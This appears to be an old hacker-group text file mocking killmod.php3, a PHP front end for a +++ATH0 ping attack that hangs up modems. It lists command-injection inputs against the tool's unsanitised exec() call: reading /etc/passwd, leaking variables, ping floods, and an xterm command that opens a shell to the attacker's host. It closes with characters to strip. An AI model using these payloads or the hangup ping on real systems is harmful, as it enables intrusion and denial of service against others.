+-==--==--==--==--==--==--==--==--==--==--==--==--+ | A Few Words Regarding killmod.php3 from Wyzewun | +--==--==--==--==--==--==--==--==--==--==--==--==-+ I was crawling around Packetstorm about fifteen minutes ago and stumbled upon killmod.php3, a strange and sad creation best described by its creators... --- snip snip --- snip snip --- snip snip --- snip snip --- snip snip --- snip killmod.php3 is a php front end that calls a simple shell script (killmod.sh) and allows you to use the +++ath0 bug to hang up older modems. -------------------------------------------------------------------------------- killmod-0.69.tar.gz contains: --- README killmod.php3 killmod.sh killmod.results bitch.txt stupid-bitch.txt --- HISTORY: This originally was a project started by me (jigz) because I had created a lame shell script that just would ping with the `+++ATH0' pattern. I was too lazy to type "ping -p 2b2b2b415448300d [target]", so I made the script so I could just "killmod [target]". Then I discovered PHP and made a lame PHP document that called the lame script, so I could do it from a website. Everything was fine until my friend monkey decided to try and exploit it. I figured it would be very unlikely. But due to the poorly written shell script, submitting the proper hex characters to the form (something like `;cat /etc/passwd') would run and print whatever was after the ";" and effectively pissed me off. After I discovered his wrongdoing and he discovered I had backdoored him, we signed a full disclosure treaty, which has worked out for the better. We worked together to create this PHP document that effectively weeds out all the nasty characters ( ; | < > & ). Monkey did the PHP coding, and I modified it to look pretty and added a few things. --- snip snip --- snip snip --- snip snip --- snip snip --- snip snip --- snip Needless to say, the Hollywood dream story is enough to make you puke. ;-) So let's take a look at how this thing works closer. The important stuff in the script would be *this* in killmod.php3: echo("killing $killmod_address"); exec("/home/httpd/cgi-bin/killmod.sh $killmod_address > /home/httpd/html/killmod.results"); And *this* in killmod.sh: /bin/ping -c 5 -p 2b2b2b415448300d $1 Okay, great, that's simple enough. Now let's think of a few ways to make the lives of those with killmod.php3 on their boxen interesting... Look at their system variables, eg. Make your input "$MACHTYPE" and the output will be something to the effect of... ping: cannot resolve i386--freebsd3.4: Host name lookup failure Make your input string "-a whatever.com" and send in a couple of hundred requests. Things will get a tad noisy over at l33t0 boy's side. ;P Make your input string "-i 1000000 whatever.com" and carry on sending requests until you figure the host's system resources have been shot to hell. Make your input `xterm -display your.hostname` to spawn an X-Windoze shell to your box. ;-) In each example I'd made so far, the inverted comma's were to be ignored - this one is the exception. Cheers, Wizdumb [MDMA] PS. I recommend always stripping these chars: &;`'\/"|*?~<>^()[]{}$\n\r% w1@mdma.za.net www.mdma.za.net